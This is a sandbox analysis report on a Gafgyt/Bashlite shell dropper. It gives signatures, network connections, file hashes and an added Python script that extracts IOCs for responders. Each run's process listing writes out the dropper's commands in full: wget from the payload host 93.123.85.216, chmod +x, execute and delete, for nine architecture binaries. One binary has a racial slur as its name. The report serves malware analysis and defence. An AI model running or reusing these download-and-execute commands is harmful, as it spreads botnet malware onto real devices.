Analysis Overview
SHA256
de36953ab2dd21eecd40090cdc4bdd7add909897c8835f20742df47d413cf7d3
Threat Level: Known bad
The file bins.sh was found to be: Known bad. It is a shell dropper: for each of nine names it fetches a binary over HTTP from 93.123.85.216, marks it executable, runs it and deletes it. Only the binary built for the sandbox's CPU gets far enough to read /proc/net/route (boobs on mipsbe, boobs2 on mipsel, roof on amd64, darkness/arm5/arm6/NIGGA7 on armhf), which is the usual multi-architecture spray of a Gafgyt/Bashlite dropper.
Malicious Activity Summary
Detected Gafgyt variant
Gafgyt/Bashlite
Executes dropped EXE
Reads system routing table
Reads system network configuration
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-03 04:52
Signatures
Analysis: behavioral3
Detonation Overview
Submitted
2024-08-03 04:52
Reported
2024-08-03 04:54
Platform
debian9-mipsbe-20240418-en
Max time kernel
92s
Max time network
16s
Signatures
Detected Gafgyt variant (nine matches; the report records no indicator, process or target detail for this signature)
Gafgyt/Bashlite
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/boobs | /tmp/boobs | N/A |
| N/A | /tmp/boobs2 | /tmp/boobs2 | N/A |
| N/A | /tmp/roof | /tmp/roof | N/A |
| N/A | /tmp/ppc | /tmp/ppc | N/A |
| N/A | /tmp/sparc | /tmp/sparc | N/A |
| N/A | /tmp/darkness | /tmp/darkness | N/A |
| N/A | /tmp/arm5 | /tmp/arm5 | N/A |
| N/A | /tmp/arm6 | /tmp/arm6 | N/A |
| N/A | /tmp/NIGGA7 | /tmp/NIGGA7 | N/A |
Reads system routing table
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/route | /tmp/boobs | N/A |
Reads system network configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/route | /tmp/boobs | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/boobs | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boobs2 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/roof | /usr/bin/wget | N/A |
| File opened for modification | /tmp/sparc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/arm5 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/darkness | /usr/bin/wget | N/A |
| File opened for modification | /tmp/arm6 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/NIGGA7 | /usr/bin/wget | N/A |
Processes
/tmp/bins.sh
[/tmp/bins.sh]
/usr/bin/wget
[wget http://93.123.85.216/boobs]
/bin/chmod
[chmod +x boobs]
/tmp/boobs
[./boobs]
/bin/rm
[rm -rf boobs]
/usr/bin/wget
[wget http://93.123.85.216/boobs2]
/bin/chmod
[chmod +x boobs2]
/tmp/boobs2
[./boobs2]
/bin/rm
[rm -rf boobs2]
/usr/bin/wget
[wget http://93.123.85.216/roof]
/bin/chmod
[chmod +x roof]
/tmp/roof
[./roof]
/bin/rm
[rm -rf roof]
/usr/bin/wget
[wget http://93.123.85.216/ppc]
/bin/chmod
[chmod +x ppc]
/tmp/ppc
[./ppc]
/bin/rm
[rm -rf ppc]
/usr/bin/wget
[wget http://93.123.85.216/sparc]
/bin/chmod
[chmod +x sparc]
/tmp/sparc
[./sparc]
/bin/rm
[rm -rf sparc]
/usr/bin/wget
[wget http://93.123.85.216/darkness]
/bin/chmod
[chmod +x darkness]
/tmp/darkness
[./darkness]
/bin/rm
[rm -rf darkness]
/usr/bin/wget
[wget http://93.123.85.216/arm5]
/bin/chmod
[chmod +x arm5]
/tmp/arm5
[./arm5]
/bin/rm
[rm -rf arm5]
/usr/bin/wget
[wget http://93.123.85.216/arm6]
/bin/chmod
[chmod +x arm6]
/tmp/arm6
[./arm6]
/bin/rm
[rm -rf arm6]
/usr/bin/wget
[wget http://93.123.85.216/NIGGA7]
/bin/chmod
[chmod +x NIGGA7]
/tmp/NIGGA7
[./NIGGA7]
/bin/rm
[rm -rf NIGGA7]
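The process listing above is the whole dropper in the open: for each of the nine names the script runs wget against 93.123.85.216, chmod +x, the binary itself, then rm. As an added example that is not part of this report or of the sandbox's tooling, the Python below parses a listing in exactly this two-line format (image path, then the bracketed command line), rebuilds the download/chmod/execute/delete chain per payload and emits the IOCs a responder needs (payload host, URLs, dropped paths). The sample input is a constructed excerpt of the first two chains from the listing; the function names and the listing format are assumptions.

```python
"""Rebuild Gafgyt-style dropper chains from a sandbox process listing.

Added example, not part of the sandbox report. Input format (assumed from
the report's Processes section): one line with the image path, followed by
one line with the command line in square brackets.
"""
import re
from collections import defaultdict
from urllib.parse import urlparse

# Constructed sample: the first two chains copied from the report's listing.
SAMPLE = """\
/tmp/bins.sh
[/tmp/bins.sh]
/usr/bin/wget
[wget http://93.123.85.216/boobs]
/bin/chmod
[chmod +x boobs]
/tmp/boobs
[./boobs]
/bin/rm
[rm -rf boobs]
/usr/bin/wget
[wget http://93.123.85.216/boobs2]
/bin/chmod
[chmod +x boobs2]
/tmp/boobs2
[./boobs2]
/bin/rm
[rm -rf boobs2]
"""

CMD_RE = re.compile(r"^\[(.*)\]$")


def parse_processes(text):
    """Return a list of (image_path, argv) tuples from the two-line listing."""
    lines = [line.strip() for line in text.splitlines() if line.strip()]
    procs = []
    for i in range(0, len(lines) - 1, 2):
        m = CMD_RE.match(lines[i + 1])
        if m is None:
            raise ValueError(f"expected [command] after {lines[i]!r}")
        procs.append((lines[i], m.group(1).split()))
    return procs


def dropper_chains(procs):
    """Group processes into per-payload chains keyed by the dropped file name.

    wget saves to the URL's basename by default, so the same name links the
    download (wget), chmod +x, ./name execution and rm clean-up steps.
    """
    chains = defaultdict(dict)
    for image, argv in procs:
        if not argv:
            continue
        tool = argv[0]
        if tool == "wget" and len(argv) > 1 and argv[1].startswith("http"):
            name = urlparse(argv[1]).path.rsplit("/", 1)[-1]
            chains[name]["url"] = argv[1]
        elif tool == "chmod" and len(argv) > 2:
            chains[argv[2]]["chmod"] = image
        elif tool.startswith("./"):
            chains[tool[2:]]["exec"] = image
        elif tool == "rm" and len(argv) > 1:
            chains[argv[-1]]["rm"] = image
    return dict(chains)


def is_complete_chain(chain):
    """True when download, chmod, execution and deletion were all observed."""
    return all(k in chain for k in ("url", "chmod", "exec", "rm"))


def extract_iocs(text):
    """Return payload host(s), URLs and dropped paths for complete chains only."""
    chains = dropper_chains(parse_processes(text))
    complete = {n: c for n, c in chains.items() if is_complete_chain(c)}
    return {
        "hosts": sorted({urlparse(c["url"]).netloc for c in complete.values()}),
        "urls": sorted(c["url"] for c in complete.values()),
        "dropped": sorted(c["exec"] for c in complete.values()),
    }


if __name__ == "__main__":
    print(extract_iocs(SAMPLE))
```

Because every chain ends in rm, none of the nine files is left on a compromised host; the hashes in the Files section below are what you match against, and on a live box the evidence is the running process (its /proc/PID/exe will read as deleted) plus the wget requests in proxy or NetFlow logs.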
Network
| Country | Destination | Domain | Proto |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| NL | 93.123.85.216:39 | | tcp |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
The connection to 93.123.85.216:39 carries no HTTP request (empty Domain column) and is the only non-download connection to the payload host; record it as a separate indicator from the port-80 fetches.
Files
/tmp/boobs
| MD5 | 1f918589efbef4b04e806b7a38fc63f8 |
| SHA1 | 758f7a47b66a52ce59462ffd1c0f223af618077c |
| SHA256 | 267bb586e092048c02e1533df5594bcdcb7d7bc45e1d7c249b624732af65b2b4 |
| SHA512 | d3d22ba6f725b0a02abd78ab62dd231b95ef17ed69376c836ab03bfc78f9e2c841b283c8eb0ee3adb4d4e7785b003afbd76197e965a6c2f09ed773d723132cbb |
/tmp/boobs2
| MD5 | 348a8f1c5535fe6a0a698f457c329485 |
| SHA1 | a3415c48c1d18776ab9a02ef23fe65cef88af354 |
| SHA256 | c11cdb76aa08f72fd9624c68a74776342c8eec86075bcfeca88c83d5d830c0e8 |
| SHA512 | e3ef6a9edc6f59eea05403785ef2bef8005248d0ec4f8714e733c1c895a6bd267e6f44c9409c4cd877a3b48dd92e7715ea00dec1e95193833234df0245e4991c |
/tmp/roof
| MD5 | ca477454b7145f6d2180e32c6f0135f6 |
| SHA1 | da25e63ea1e5fed9abf321ddf4a82eaa76717bb6 |
| SHA256 | 6a9406b7230fd0f2b6471bc341dba064b48959aa46e51759c3fafebd50e837d4 |
| SHA512 | 561199819d8b51d51abc6a3fb786f45c28d5b04904efec549fddc4f35b36a45a66c54fb44d4a2f5c1139374c0f3bdd52f3abd565d67e383c25d338193e699d80 |
/tmp/ppc
| MD5 | 5cf85a36699cca11be8c96c3232654e0 |
| SHA1 | 897379599414d22c9adf9b542266eb6b888b6542 |
| SHA256 | d0fa6a48fc3767aa569af289cdd06699c183839f942465540a2bdc112e151419 |
| SHA512 | de9e55d3fec5bcb0791922ff7e2fc1addd8e76e83ad3a018cdd67cf3ddde2cc09571a520349361acf9024123ba5976bd68f1aaeec82693103149290bff6be552 |
/tmp/sparc
| MD5 | 0e2c431d0b76d5d91af24cd90532cd93 |
| SHA1 | 402554d878c7e73cdf145bb249c604a21e465e1f |
| SHA256 | 16c5cfb57ffcd3bd87e44f2c754d7fa6634c71cc06cf5d11a743d899cb546257 |
| SHA512 | 8b0adab651805ea96e702e49013ae9e16d6858f0667bca352eefc12ae28d625f4a68135b915a14572ddec48ea22470e6d6dd9c91a2c4bfa03e35586ef6a246cc |
/tmp/darkness
| MD5 | 24393febb5e8a233a8df7f00b8c3b147 |
| SHA1 | f8240c5256c8a193ee8f2f93880203eca2f827d5 |
| SHA256 | 49eaa16a775f35ae87b75eb7a31dc421adff1054ca3af19ec6a6c90e83f47d42 |
| SHA512 | be1ca8c139095fe4be2f8cbcdc4f5adf304e05a3f0f1f94b2c522957de0ce197b6ab8e16a17d1e3d8afbb06d9b3019bca134eeba3197bd6917fadb144a9a86c6 |
/tmp/arm5
| MD5 | e57c0097d80d17a52aad01a8c2e4f9fc |
| SHA1 | fffadcdb51b879236df4d4cdf373216dd926e90e |
| SHA256 | 68a34ef0cc4e40fb5470c235ed5f2b583b619549b546dcfda3101d847f3e2f3a |
| SHA512 | 02e7100e343d14f88a1f68539dea16c633e8de9fb6859cf54c60873565f7666595a5ee131bc38ea5f5b306a740b7f8c8db68f3a124b77c9f63eee8f492d75464 |
/tmp/arm6
| MD5 | 1e78f279e22858585947a52ad8b127d7 |
| SHA1 | 62f68fbf960fd0bfda74d5d89d74cbf8eaa630f7 |
| SHA256 | 616160f4a408c4dfe23d91f102a4f7db79e005b75013f34b4d0ea2e35a047377 |
| SHA512 | 2d5439708fd887b3b9b79f877d0f1474c277b6459221726d428e96cdc1fdfea7665bdaab03c7a77df720713cc5eb9e90a5177f2c27212a2c5993b9338ce39921 |
/tmp/NIGGA7
| MD5 | 658e8ab8f1bf7db543aa9b2b2fd595ce |
| SHA1 | ce122d9bc9920bbd77826fcd7676f3081ec19752 |
| SHA256 | 29e40415b4a7a270bd679a81ae16ab70c15d7a525b5701da5ce494600f60831c |
| SHA512 | eb8056c08a88ce14bb4a028f9f93a70dfb54e0a83ac565ddb2c4d4ef8aeafba7b8105e4e14bd807ebcb46d987d625e3ccae655c3170ee5cc51b513a542e4984f |
Analysis: behavioral4
Detonation Overview
Submitted
2024-08-03 04:52
Reported
2024-08-03 04:54
Platform
debian9-mipsel-20240729-en
Max time kernel
92s
Max time network
14s
Signatures
Detected Gafgyt variant (nine matches; the report records no indicator, process or target detail for this signature)
Gafgyt/Bashlite
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/boobs | /tmp/boobs | N/A |
| N/A | /tmp/boobs2 | /tmp/boobs2 | N/A |
| N/A | /tmp/roof | /tmp/roof | N/A |
| N/A | /tmp/ppc | /tmp/ppc | N/A |
| N/A | /tmp/sparc | /tmp/sparc | N/A |
| N/A | /tmp/darkness | /tmp/darkness | N/A |
| N/A | /tmp/arm5 | /tmp/arm5 | N/A |
| N/A | /tmp/arm6 | /tmp/arm6 | N/A |
| N/A | /tmp/NIGGA7 | /tmp/NIGGA7 | N/A |
Reads system routing table
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/route | /tmp/boobs2 | N/A |
Reads system network configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/route | /tmp/boobs2 | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/roof | /usr/bin/wget | N/A |
| File opened for modification | /tmp/ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/sparc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/darkness | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boobs | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boobs2 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/arm5 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/arm6 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/NIGGA7 | /usr/bin/wget | N/A |
Processes
/tmp/bins.sh
[/tmp/bins.sh]
/usr/bin/wget
[wget http://93.123.85.216/boobs]
/bin/chmod
[chmod +x boobs]
/tmp/boobs
[./boobs]
/bin/rm
[rm -rf boobs]
/usr/bin/wget
[wget http://93.123.85.216/boobs2]
/bin/chmod
[chmod +x boobs2]
/tmp/boobs2
[./boobs2]
/bin/rm
[rm -rf boobs2]
/usr/bin/wget
[wget http://93.123.85.216/roof]
/bin/chmod
[chmod +x roof]
/tmp/roof
[./roof]
/bin/rm
[rm -rf roof]
/usr/bin/wget
[wget http://93.123.85.216/ppc]
/bin/chmod
[chmod +x ppc]
/tmp/ppc
[./ppc]
/bin/rm
[rm -rf ppc]
/usr/bin/wget
[wget http://93.123.85.216/sparc]
/bin/chmod
[chmod +x sparc]
/tmp/sparc
[./sparc]
/bin/rm
[rm -rf sparc]
/usr/bin/wget
[wget http://93.123.85.216/darkness]
/bin/chmod
[chmod +x darkness]
/tmp/darkness
[./darkness]
/bin/rm
[rm -rf darkness]
/usr/bin/wget
[wget http://93.123.85.216/arm5]
/bin/chmod
[chmod +x arm5]
/tmp/arm5
[./arm5]
/bin/rm
[rm -rf arm5]
/usr/bin/wget
[wget http://93.123.85.216/arm6]
/bin/chmod
[chmod +x arm6]
/tmp/arm6
[./arm6]
/bin/rm
[rm -rf arm6]
/usr/bin/wget
[wget http://93.123.85.216/NIGGA7]
/bin/chmod
[chmod +x NIGGA7]
/tmp/NIGGA7
[./NIGGA7]
/bin/rm
[rm -rf NIGGA7]
Network
| Country | Destination | Domain | Proto |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| NL | 93.123.85.216:39 | | tcp |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
Files
Same nine files as in behavioral3 (/tmp/boobs, /tmp/boobs2, /tmp/roof, /tmp/ppc, /tmp/sparc, /tmp/darkness, /tmp/arm5, /tmp/arm6, /tmp/NIGGA7) with identical MD5, SHA1, SHA256 and SHA512 values; see that analysis for the hashes.
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-03 04:52
Reported
2024-08-03 04:54
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
103s
Max time network
128s
Signatures
Detected Gafgyt variant (nine matches; the report records no indicator, process or target detail for this signature)
Gafgyt/Bashlite
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/boobs | /tmp/boobs | N/A |
| N/A | /tmp/boobs2 | /tmp/boobs2 | N/A |
| N/A | /tmp/roof | /tmp/roof | N/A |
| N/A | /tmp/ppc | /tmp/ppc | N/A |
| N/A | /tmp/sparc | /tmp/sparc | N/A |
| N/A | /tmp/darkness | /tmp/darkness | N/A |
| N/A | /tmp/arm5 | /tmp/arm5 | N/A |
| N/A | /tmp/arm6 | /tmp/arm6 | N/A |
| N/A | /tmp/NIGGA7 | /tmp/NIGGA7 | N/A |
Reads system routing table
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/route | /tmp/roof | N/A |
Reads system network configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/route | /tmp/roof | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/boobs2 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/sparc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boobs | /usr/bin/wget | N/A |
| File opened for modification | /tmp/roof | /usr/bin/wget | N/A |
| File opened for modification | /tmp/darkness | /usr/bin/wget | N/A |
| File opened for modification | /tmp/arm5 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/arm6 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/NIGGA7 | /usr/bin/wget | N/A |
Processes
/tmp/bins.sh
[/tmp/bins.sh]
/usr/bin/wget
[wget http://93.123.85.216/boobs]
/bin/chmod
[chmod +x boobs]
/tmp/boobs
[./boobs]
/bin/rm
[rm -rf boobs]
/usr/bin/wget
[wget http://93.123.85.216/boobs2]
/bin/chmod
[chmod +x boobs2]
/tmp/boobs2
[./boobs2]
/bin/rm
[rm -rf boobs2]
/usr/bin/wget
[wget http://93.123.85.216/roof]
/bin/chmod
[chmod +x roof]
/tmp/roof
[./roof]
/bin/rm
[rm -rf roof]
/usr/bin/wget
[wget http://93.123.85.216/ppc]
/bin/chmod
[chmod +x ppc]
/tmp/ppc
[./ppc]
/bin/rm
[rm -rf ppc]
/usr/bin/wget
[wget http://93.123.85.216/sparc]
/bin/chmod
[chmod +x sparc]
/tmp/sparc
[./sparc]
/bin/rm
[rm -rf sparc]
/usr/bin/wget
[wget http://93.123.85.216/darkness]
/bin/chmod
[chmod +x darkness]
/tmp/darkness
[./darkness]
/bin/rm
[rm -rf darkness]
/usr/bin/wget
[wget http://93.123.85.216/arm5]
/bin/chmod
[chmod +x arm5]
/tmp/arm5
[./arm5]
/bin/rm
[rm -rf arm5]
/usr/bin/wget
[wget http://93.123.85.216/arm6]
/bin/chmod
[chmod +x arm6]
/tmp/arm6
[./arm6]
/bin/rm
[rm -rf arm6]
/usr/bin/wget
[wget http://93.123.85.216/NIGGA7]
/bin/chmod
[chmod +x NIGGA7]
/tmp/NIGGA7
[./NIGGA7]
/bin/rm
[rm -rf NIGGA7]
Network
| Country | Destination | Domain | Proto |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| GB | 185.125.188.61:443 | | tcp |
| GB | 185.125.188.61:443 | | tcp |
| US | 151.101.193.91:443 | | tcp |
| US | 151.101.193.91:443 | | tcp |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| NL | 93.123.85.216:39 | | tcp |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| GB | 195.181.164.14:443 | | tcp |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
224.0.0.251:5353 is the mDNS multicast address, and the TLS connections to 185.125.188.61, 151.101.193.91 and 195.181.164.14 are attributed to no process or domain in the report and appear only in this Ubuntu run, not in the three Debian runs; treat them as sandbox background traffic rather than as indicators unless confirmed separately.
Files
Same nine files as in behavioral3 (/tmp/boobs, /tmp/boobs2, /tmp/roof, /tmp/ppc, /tmp/sparc, /tmp/darkness, /tmp/arm5, /tmp/arm6, /tmp/NIGGA7) with identical MD5, SHA1, SHA256 and SHA512 values; see that analysis for the hashes.
Analysis: behavioral2
Detonation Overview
Submitted
2024-08-03 04:52
Reported
2024-08-03 04:54
Platform
debian9-armhf-20240611-en
Max time kernel
101s
Max time network
17s
Signatures
Detected Gafgyt variant (nine matches; the report records no indicator, process or target detail for this signature)
Gafgyt/Bashlite
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/boobs | /tmp/boobs | N/A |
| N/A | /tmp/boobs2 | /tmp/boobs2 | N/A |
| N/A | /tmp/roof | /tmp/roof | N/A |
| N/A | /tmp/ppc | /tmp/ppc | N/A |
| N/A | /tmp/sparc | /tmp/sparc | N/A |
| N/A | /tmp/darkness | /tmp/darkness | N/A |
| N/A | /tmp/arm5 | /tmp/arm5 | N/A |
| N/A | /tmp/arm6 | /tmp/arm6 | N/A |
| N/A | /tmp/NIGGA7 | /tmp/NIGGA7 | N/A |
Reads system routing table
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/route | /tmp/darkness | N/A |
| File opened for reading | /proc/net/route | /tmp/arm5 | N/A |
| File opened for reading | /proc/net/route | /tmp/arm6 | N/A |
| File opened for reading | /proc/net/route | /tmp/NIGGA7 | N/A |
Reads system network configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/route | /tmp/darkness | N/A |
| File opened for reading | /proc/net/route | /tmp/arm5 | N/A |
| File opened for reading | /proc/net/route | /tmp/arm6 | N/A |
| File opened for reading | /proc/net/route | /tmp/NIGGA7 | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/boobs | /usr/bin/wget | N/A |
| File opened for modification | /tmp/roof | /usr/bin/wget | N/A |
| File opened for modification | /tmp/ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/arm6 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boobs2 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/sparc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/darkness | /usr/bin/wget | N/A |
| File opened for modification | /tmp/arm5 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/NIGGA7 | /usr/bin/wget | N/A |
Processes
/tmp/bins.sh
[/tmp/bins.sh]
/usr/bin/wget
[wget http://93.123.85.216/boobs]
/bin/chmod
[chmod +x boobs]
/tmp/boobs
[./boobs]
/bin/rm
[rm -rf boobs]
/usr/bin/wget
[wget http://93.123.85.216/boobs2]
/bin/chmod
[chmod +x boobs2]
/tmp/boobs2
[./boobs2]
/bin/rm
[rm -rf boobs2]
/usr/bin/wget
[wget http://93.123.85.216/roof]
/bin/chmod
[chmod +x roof]
/tmp/roof
[./roof]
/bin/rm
[rm -rf roof]
/usr/bin/wget
[wget http://93.123.85.216/ppc]
/bin/chmod
[chmod +x ppc]
/tmp/ppc
[./ppc]
/bin/rm
[rm -rf ppc]
/usr/bin/wget
[wget http://93.123.85.216/sparc]
/bin/chmod
[chmod +x sparc]
/tmp/sparc
[./sparc]
/bin/rm
[rm -rf sparc]
/usr/bin/wget
[wget http://93.123.85.216/darkness]
/bin/chmod
[chmod +x darkness]
/tmp/darkness
[./darkness]
/bin/rm
[rm -rf darkness]
/usr/bin/wget
[wget http://93.123.85.216/arm5]
/bin/chmod
[chmod +x arm5]
/tmp/arm5
[./arm5]
/bin/rm
[rm -rf arm5]
/usr/bin/wget
[wget http://93.123.85.216/arm6]
/bin/chmod
[chmod +x arm6]
/tmp/arm6
[./arm6]
/bin/rm
[rm -rf arm6]
/usr/bin/wget
[wget http://93.123.85.216/NIGGA7]
/bin/chmod
[chmod +x NIGGA7]
/tmp/NIGGA7
[./NIGGA7]
/bin/rm
[rm -rf NIGGA7]
Network
| Country | Destination | Domain | Proto |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| NL | 93.123.85.216:39 | | tcp |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| NL | 93.123.85.216:39 | | tcp |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| NL | 93.123.85.216:39 | | tcp |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| NL | 93.123.85.216:39 | | tcp |
Files
Same nine files as in behavioral3 (/tmp/boobs, /tmp/boobs2, /tmp/roof, /tmp/ppc, /tmp/sparc, /tmp/darkness, /tmp/arm5, /tmp/arm6, /tmp/NIGGA7) with identical MD5, SHA1, SHA256 and SHA512 values; see that analysis for the hashes.